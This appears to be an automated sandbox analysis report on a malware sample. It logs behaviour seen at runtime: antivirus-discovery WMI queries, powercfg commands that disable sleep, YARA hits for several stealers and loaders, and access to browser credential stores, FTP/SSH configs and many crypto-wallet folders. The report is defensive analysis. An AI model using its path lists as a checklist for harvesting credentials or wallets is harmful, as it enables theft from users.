Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0042C650 GetSystemTimeAsFileTime,

2_2_0042C650

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00442070 GetComputerNameA,__aulldiv,GlobalAlloc,LookupAccountNameA,GetLastError,ConvertSidToStringSidA,GetLastError,

2_2_00442070

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0042DCD0 RtlGetVersion,GetVersionExA,

2_2_0042DCD0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1749729398.0000000001091000.00000004.00000020.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1752375741.0000000000851000.00000004.00000020.00020000.00000000.sdmp, RK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1702372712.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, kCxbYlQ2A6NZXLbKZjtnUx3R.exe, 0000000E.00000002.1656855821.0000000001561000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1749729398.0000000001091000.00000004.00000020.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1752375741.0000000000851000.00000004.00000020.00020000.00000000.sdmp, RK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1702372712.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, kCxbYlQ2A6NZXLbKZjtnUx3R.exe, 0000000E.00000002.1656855821.0000000001561000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2155274987.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Clipboard Hijacker

Source: Yara match	File source: 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000011.00000002.2757239787.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1618173689.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1704277964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1829361336.0000000004155000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 29.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RK8ajtyf9pvKlaXEo3EjTbnu.exe PID: 7964, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Socks5Systemz

Source: Yara match	File source: 00000023.00000002.2812741708.0000000002D0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2813195969.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 31.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2425101444.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: v7u3knm8W6_1U6jDWPH31qsx.exe	String found in binary or memory: Electrum
Source: v7u3knm8W6_1U6jDWPH31qsx.exe	String found in binary or memory: \ElectronCash\wallets
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000000.1618549346.0000000000887000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: s\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)CLR_v2.0PlaceholderTileLogoFolderVirtualStoreWindows Photo ViewerjnlgamecbpmbajjfhmmmlhejkemejdmaRealPlayerRealNetworksSYACOneDrive\.pngPower BI DesktopSystemCertificatesVaultemojiBlizzard EntertainmentBattle.netODISpaint.netAmpMeltytech.openshot_qtMusic
Source: v7u3knm8W6_1U6jDWPH31qsx.exe	String found in binary or memory: com.liberty.jaxx
Source: v7u3knm8W6_1U6jDWPH31qsx.exe	String found in binary or memory: s\Exodus\backup
Source: v7u3knm8W6_1U6jDWPH31qsx.exe	String found in binary or memory: Exodus\
Source: v7u3knm8W6_1U6jDWPH31qsx.exe	String found in binary or memory: Ethereum (UTC)
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe

Directory queried: C:\Users\user\Documents\iofolko5

Source: Yara match	File source: 0000001D.00000002.2552634631.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2354690717.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000011.00000002.2757239787.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1618173689.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1704277964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1829361336.0000000004155000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 29.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RK8ajtyf9pvKlaXEo3EjTbnu.exe PID: 7964, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Socks5Systemz

Source: Yara match	File source: 00000023.00000002.2812741708.0000000002D0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2813195969.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 31.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2425101444.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
